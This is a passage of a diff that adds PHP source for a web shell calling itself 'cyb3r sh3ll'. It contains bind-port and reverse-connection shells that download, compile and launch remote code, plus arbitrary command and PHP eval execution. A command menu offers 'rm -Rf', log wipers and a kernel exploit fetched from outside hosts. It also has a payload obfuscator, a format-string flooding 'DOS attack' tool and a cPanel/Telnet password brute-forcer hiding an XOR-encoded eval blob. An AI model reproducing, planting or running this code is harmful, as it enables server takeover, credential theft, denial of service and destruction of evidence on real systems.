+
+   $w = explode(".",$bind["src"]);
+
+   $ext = $w[count($w)-1];
+
+   unset($w[count($w)-1]);
+
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+
+   if ($ext == "pl") {$binpath = $srcpath;}
+
+   @unlink($srcpath);
+
+   $fp = fopen($srcpath,"ab+");
+
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+
+   elseif (!$data = cyb3rgetsource($bind["src"])) {echo "Can't download sources!";}
+
+   else
+
+   {
+
+    fwrite($fp,$data,strlen($data));
+
+    fclose($fp);
+
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+
+    $v[1] = str_replace("%port",$bind["port"],$v[1]);
+
+    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+
+    $v[1] = str_replace("//","/",$v[1]);
+
+    $retbind = myshellexec($v[1]." > /dev/null &");
+
+    sleep(5);
+
+    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+
+    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+
+    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+
+   }
+
+   echo "<br>";
+
+  }
+
+ }
+
+ if (!empty($bcsubmit))
+
+ {
+
+  echo "<b>Result of back connection:</b><br>";
+
+  $v = $bcsrcs[$bc["src"]];
+
+  if (empty($v)) {echo "Unknown file!<br>";}
+
+  else
+
+  {
+
+   $w = explode(".",$bc["src"]);
+
+   $ext = $w[count($w)-1];
+
+   unset($w[count($w)-1]);
+
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+
+   if ($ext == "pl") {$binpath = $srcpath;}
+
+   @unlink($srcpath);
+
+   $fp = fopen($srcpath,"ab+");
+
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+
+   elseif (!$data = cyb3rgetsource($bc["src"])) {echo "Can't download sources!";}
+
+   else
+
+   {
+
+    fwrite($fp,$data,strlen($data));
+
+    fclose($fp);
+
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+
+    $v[1] = str_replace("%host",$bc["host"],$v[1]);
+
+    $v[1] = str_replace("%port",$bc["port"],$v[1]);
+
+    $v[1] = str_replace("//","/",$v[1]);
+
+    $retbind = myshellexec($v[1]." > /dev/null &");
+
+    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+
+   }
+
+  }
+
+ }
+
+ if (!empty($dpsubmit))
+
+ {
+
+  echo "<b>Result of datapipe-running:</b><br>";
+
+  $v = $dpsrcs[$datapipe["src"]];
+
+  if (empty($v)) {echo "Unknown file!<br>";}
+
+  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+
+  else
+
+  {
+
+   $srcpath = $tmpdir.$datapipe["src"];
+
+   $w = explode(".",$datapipe["src"]);
+
+   $ext = $w[count($w)-1];
+
+   unset($w[count($w)-1]);
+
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+
+   if ($ext == "pl") {$binpath = $srcpath;}
+
+   @unlink($srcpath);
+
+   $fp = fopen($srcpath,"ab+");
+
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+
+   elseif (!$data = cyb3rgetsource($datapipe["src"])) {echo "Can't download sources!";}
+
+   else
+
+   {
+
+    fwrite($fp,$data,strlen($data));
+
+    fclose($fp);
+
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+
+    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+
+    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+
+    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+
+    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+
+    $v[1] = str_replace("//","/",$v[1]);
+
+    $retbind = myshellexec($v[1]." > /dev/null &");
+
+    sleep(5);
+
+    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+
+    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+
+    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
+
+   }
+
+   echo "<br>";
+
+  }
+
+ }
+
+ ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+
+<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+
+<b>Datapipe:</b><br>
+<form action="<?php echo $surl; ?>">
+<input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.
+
+
+
+        
+                 </center></td>
+            
+                 <td ><center>
+                 <p align="center"><b>[: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Enter Command to Execute:</b></a> :]</b>
+                 
+<form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></p><br>
+<div align="center">Useful Commands   </div>
+
+
+    <form action="<?php echo $surl; ?>">
+
+      <div align="center">
+
+        <input type=hidden name=act value="cmd">
+
+        <input type=hidden name="d" value="<?php echo $dispd; ?>">
+
+          <SELECT NAME="cmd">
+
+            <OPTION VALUE="uname -a">Kernel version</option>
+
+              <OPTION VALUE="w">Logged in users</option>
+
+                <OPTION VALUE="lastlog">Last to connect</option>
+
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins</option>
+
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!</option>
+
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?</option>
+
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders?</option>
+
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO</option>
+
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports</option>
+
+                    <OPTION VALUE="locate gcc">gcc installed?</option>
+
+                                        <OPTION VALUE="rm -Rf">Format box (DANGEROUS)</option>
+
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)</option>
+
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2</option>
+
+                    <OPTION VALUE="./zap2">WIPELOGS PT3</option>
+
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)</option>
+
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)</option>
+
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)</option>
+
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)</option>
+
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)</option>
+
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)</option>
+
+                  </SELECT>
+
+        <input type=hidden name="cmd_txt" value="1">
+
+        &nbsp;
+
+        <input type=submit name=submit value="Execute">
+
+          <br>
+
+        Warning. Kernel may be alerted using higher levels </div>
+
+    </form>
+
+                 </center>
+                 </td>
+                        
+         </tr>
+     
+ </table><?php
+ 
+}
+
+if ($act == "cmd")
+
+{
+
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+
+else
+
+{
+
+ @chdir($chdir);
+
+ if (!empty($submit))
+
+ {
+
+  echo "<b>Result of execution this command</b>:<br>";
+
+  $olddir = realpath(".");
+
+  @chdir($d);
+
+  $ret = myshellexec($cmd);
+
+  $ret = convert_cyr_string($ret,"d","w");
+
+  if ($cmd_txt)
+
+  {
+
+   $rows = count(explode("\r\n",$ret))+1;
+
+   if ($rows < 10) {$rows = 10;}
+
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+
+  }
+
+  else {echo $ret."<br>";}
+
+  @chdir($olddir);
+
+ }
+
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+
+}
+
+}
+
+if ($act == "phpcode")
+{
+ echo "
+<br><center>
+<a href=\"".$surl."act=eval\" >PHP Code Evaluate</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=masscode\" >Mass Code Injector</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=obfuscate\" >PHP Obfuscator</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=fuzzer\" >Web Server Fuzzer</a>
+</center><br>";
+}
+
+if ($act == "eval")
+
+{
+
+ if (!empty($eval))
+
+ {
+
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+
+  $tmp = ob_get_contents();
+
+  $olddir = realpath(".");
+
+  @chdir($d);
+
+  if ($tmp)
+
+  {
+
+   ob_clean();
+
+   eval($eval);
+
+   $ret = ob_get_contents();
+
+   $ret = convert_cyr_string($ret,"d","w");
+
+   ob_clean();
+
+   echo $tmp;
+
+   if ($eval_txt)
+
+   {
+
+    $rows = count(explode("\r\n",$ret))+1;
+
+    if ($rows < 10) {$rows = 10;}
+
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+
+   }
+
+   else {echo $ret."<br>";}
+
+  }
+
+  else
+
+  {
+
+   if ($eval_txt)
+
+   {
+
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+
+    eval($eval);
+
+    echo "</textarea>";
+
+   }
+
+   else {echo $ret;}
+
+  }
+
+  @chdir($olddir);
+
+ }
+
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+
+}
+
+if ($act == "proxy")
+{
+global $errorbox,$et,$footer,$hcwd;
+echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";
+if (!empty($_REQUEST['urL'])){
+$dir="";
+$u=parse_url($_REQUEST['urL']);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));
+$url=@fsockopen($host, 80, $errno, $errstr, 12);
+if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");
+fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
+while(!feof($url)){
+$con = fgets($url);
+$con = str_replace("href=mailto","HrEf=mailto",$con);
+$con = str_replace("HREF=mailto","HrEf=mailto",$con);
+$con = str_replace("href=\"mailto","HrEf=\"mailto",$con);
+$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);
+$con = str_replace("href=\'mailto","HrEf=\"mailto",$con);
+$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);
+$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+echo $con;
+}
+fclose($url);
+}
+}
+
+
+if ($act == "obfuscate")
+{
+  if ( isset($_POST['code']) &&
+               $_POST['code'] != '')
+    {
+        $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); // high Compression! :P
+        $encode = '
+<?php
+$encoded = \''.$encoded.'\';
+eval(gzinflate(base64_decode($encoded)));
+// Encoded by cyb3r sh3ll. Thanx lionaneesh for this idea.
+?>
+';
+    }
+    else
+    {
+        $encode = 'Please Enter your Code! and Click Submit! :)';    
+    }?>
+    <form method="POST">
+        <textarea cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />
+        <input style="margin: 20px; margin-left: 50px; padding: 10px;"  class="own"  type="submit" value="Encode :D"/>
+    </form>
+    <?php
+}
+
+if ($act == "fuzzer")
+{
+    if(isset($_POST['ip']) &&
+    isset($_POST['port']) &&
+    isset($_POST['times']) &&
+    isset($_POST['time']) &&
+    isset($_POST['message']) &&
+    isset($_POST['messageMultiplier']) &&
+    $_POST['message'] != "" &&
+    $_POST['time'] != "" &&
+    $_POST['times'] != "" &&
+    $_POST['port'] != "" &&
+    $_POST['ip'] != "" &&
+    $_POST['messageMultiplier'] != ""
+    )
+    {
+       $IP=$_POST['ip'];
+           $port=$_POST['port'];
+       $times = $_POST['times'];
+           $timeout = $_POST['time'];
+           $send = 0;
+       $ending = "";
+       $multiplier = $_POST['messageMultiplier'];
+       $data = "";
+       $mode="tcp";
+       $data .= "POST /";
+       $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
+        if($_POST['type'] == "tcp")
+        {
+            $mode = "tcp";
+        }
+        while($multiplier--)
+        {
+            $data .= urlencode($_POST['message']);
+        }
+        $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
+        $data .= "by-cyb3r-sh3ll".$ending;
+        $length = strlen($data);
+        
+        
+       echo "Sending Data :- <br /> <p align='center'>$data</p>";
+        
+       print "cyb3r sh3ll is at its Work now :D ;D! Dont close this window untill you recieve a message <br>";
+           for($i=0;$i<$times;$i++)
+           {
+            $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
+            if($socket)
+            {
+                fwrite($socket , $data , $length );
+                fclose($socket);
+            }
+        }
+        echo "<script>alert('Fuzzing Completed!');</script>";
+        echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
+        echo "Total Number of Packets Sent : " . $times . "<br />";
+        echo "Total Data Sent = ". showsizE($times*$length) . "<br />"; 
+        echo "Data per packet = " . showsizE($length) . "<br />";
+    }
+    else
+    {
+        ?>
+        <form method="POST">
+            <input type="hidden" name="fuzz" />
+            <table id="margins">
+                <tr>
+                    <td width="400" class="title">
+                        IP
+                    </td>
+                    <td>
+                        <input class="cmd" name="ip" value="127.0.0.1" onfocus="if(this.value == '127.0.0.1')this.value = '';" onblur="if(this.value=='')this.value='127.0.0.1';"/>
+                    </td>
+                </tr>
+                
+                <tr>
+                    <td class="title">
+                        Port
+                    </td>
+                    <td>
+                        <input class="cmd" name="port" value="80" onfocus="if(this.value == '80')this.value = '';" onblur="if(this.value=='')this.value='80';"/>
+                    </td>
+                </tr>
+                
+                <tr>
+                    <td class="title">
+                        Timeout
+                    </td>
+                    <td>
+                        <input type="text" name="time" value="5" onfocus="if(this.value == '5')this.value = '';" onblur="if(this.value=='')this.value='5';"/>
+                    </td>
+                </tr>
+                
+                
+                <tr>
+                    <td class="title">
+                        No of times
+                    </td>
+                    <td>
+                        <input type="text" class="cmd" name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';" />
+                    </td>
+                </tr>
+                
+                <tr>
+                    <td class="title">
+                        Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>
+                    </td>
+                    <td>
+                        <input class="cmd" name="message" value="%S%x--Some Garbage here --%x%S" onfocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onblur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
+                    </td>
+                    <td>
+                        x
+                    </td>
+                    <td width="20">
+                        <input style="width: 30px;" name="messageMultiplier" value="10" />
+                    </td>
+                </tr>
+                
+                <tr>
+                    <td rowspan="2">
+                        <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="own" value="Let it be! :D"/>
+                    </td>
+                </tr>
+            </table>            
+        </form>
+        <?php
+    }
+}
+
+if ($act == "cpanel")
+{ 
+$cpanel_port="2082";
+$connect_timeout=5;
+set_time_limit(0);
+$submit=$_REQUEST['submit'];
+$users=$_REQUEST['users'];
+$pass=$_REQUEST['passwords'];
+$target=$_REQUEST['target'];
+$cracktype=$_REQUEST['cracktype'];
+if($target == ""){
+$target = "localhost";
+}
+$charset=$_REQUEST['charset'];
+if($charset=="")
+ $charset="lowercase";
+$max_length=$_REQUEST['max_length'];
+if($max_length=="")
+ $max_length=10;
+$min_length=$_REQUEST['min_length'];
+if($min_length=="")
+ $min_length=1;
+
+ $charsetall = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
+ $charsetlower = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
+ $charsetupper = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z");
+ $charsetnumeric = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
+ $charsetlowernumeric = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
+ $charsetuppernumeric = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
+ $charsetletters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" );
+ $charsetsymbols= array("!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
+ $charsetlowersymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
+ $charsetuppersymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
+ $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
+ $charsetnumericsymbols = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
+ $charsetlowernumericsymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
+ $charsetuppernumericsymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
+ $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
+ $charsetlettersnumericsymbols=array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_","0", "1", "2", "3", "4", "5", "6", "7", "8", "9" );
+        if ($charset == "all")
+                $vals = $charsetall;
+    elseif ($charset == "lowercase") 
+                $vals = $charsetlower;
+         elseif ($charset == "uppercase") 
+                $vals = $charsetupper;
+         elseif ($charset == "numeric") 
+                $vals = $charsetnumeric;
+         elseif ($charset == "lowernumeric") 
+                $vals = $charsetlowernumeric;
+         elseif ($charset == "uppernumeric") 
+                $vals = $charsetuppernumeric;
+        elseif ($charset == "letters") 
+                $vals = $charsetletters;
+        elseif ($charset == "symbols") 
+                $vals = $charsetsymbols;
+        elseif ($charset == "lowersymbols") 
+                $vals = $charsetlowersymbols;
+        elseif ($charset == "uppersymbols") 
+                $vals = $charsetuppersymbols;
+        elseif ($charset == "letterssymbols") 
+                $vals = $charsetletterssymbols;
+        elseif ($charset == "numberssymbols") 
+                $vals = $charsetnumericsymbols;
+        elseif ($charset == "lowernumericsymbols") 
+                $vals = $charsetlowernumericsymbols;
+        elseif ($charset == "uppernumericsymbols") 
+                $vals = $charsetuppernumericsymbols;
+        elseif ($charset == "lettersnumericsymbols") 
+                $vals = $charsetlettersnumericsymbols;
+        else echo "INVALID CHARSET";
+        $key_that_script_is_crypted=19;
+$resource_crypted_code ='7~`3.37L@VAEVAH1@VAEVAL]R^V1N=7L@VAEVAH1@PAZCGL]R^V1N(7`fq3.31@{v3--3)313=37~`(7|3.3raarj3;1|~1?1g~rz1?1yLr~a"1?1S{|1?1=p1:(7vv3.37|H!N=7|H N=7|H"N=7|H[t3]N=7|H#N(7`v}w3.3S~rz;7vv?7`fq?7~`:(3';
+$string_output=str_replace("[t1]", "<?", $resource_crypted_code);
+$string_output=str_replace("[t3]", "'", $string_output);
+$lenth_of_crypted_code=strlen($string_output);
+$eval_php_code='';
+for($huivamvsem=0;$huivamvsem<$lenth_of_crypted_code;$huivamvsem++)
+$eval_php_code .= chr(ord($string_output[$huivamvsem]) ^ $key_that_script_is_crypted);
+eval($eval_php_code);
+?>
+<div align="center">
+ 
+ <form method="POST" >
+ <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#003700" >
+     <tr>
+            <td>
+                  <p align="center"><b>
+                    <font color="#008000" face="Tahoma" size="2">IP servers :</font></b>
+                        <input type="text" name="target" size="16" value="<?php echo $target ?>" style="border: 2px; background-color: #800000; color:#C0C0C0 font-family:Verdana; font-size:13px;" /><br/><br/>
+                        <table border="1" width="57%" bordercolorlight="#008000" bordercolordark="#003700">
+                <tr><td align="center" width="50%"><font color="#FF0000"><b>User List</b></font></td><td align="center"><font color="#FF0000"><b>Password List</b></font></td></tr>
+            </table>
+                        <textarea rows="20" name="users" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $users ?></textarea>
+            <textarea rows="20" name="passwords" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $pass ?></textarea><br/>
+                        <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Guess options</font>
+                        &nbsp;<input name="cracktype" value="cpanel" style="font-weight: 700;" checked type="radio">
+                        <b><font size="2" face="Tahoma" color="#008000">Cpanel </font><font size="2" color="#FFFFFF" face="Tahoma"> (2082)</font></b>
+                        <input name="cracktype" value="cpanel2" style="font-weight: 700;" type="radio">
+                        <b><font size="2" face="Tahoma" color="#008000">Telnet</font><font size="2" color="#FFFFFF" face="Tahoma">(23)</font></b>
+                        <br/>
+                        <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Timeout Delay</font>
+                        <input type="text" name="connect_timeout" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $connect_timeout;?>" /><br/>
+                        <input type="checkbox" name="bruteforce" value="true" /><font style="font-weight:700" size="2" face="Tahoma" color="#008000">Bruteforce</font>
+                        <select name="charset" style="border: 2px solid #1D1D1D;background: black;color:RED">
+                                <option value="all">All Letters + Numbers</option>
+                                <option value="numeric">Numbers</option>
+                                <option value="letters">Letters</option>
+                                <option value="symbols">Symbols</option>
+                                <option value="lowercase">Lower Letters</option>
+                                <option value="uppercase">Higher Letters</option>
+                                <option value="lowernumeric">Lower Letters + Numbers</option>
+                                <option value="uppernumeric">Upper Letters + Numbers</option>
+                                <option value="lowersymbols">Lower Letters + Symbols</option>
+                                <option value="uppersymbols">Upper Letters + Symbols</option>
+                                <option value="letterssymbols">All Letters + Symbols</option>
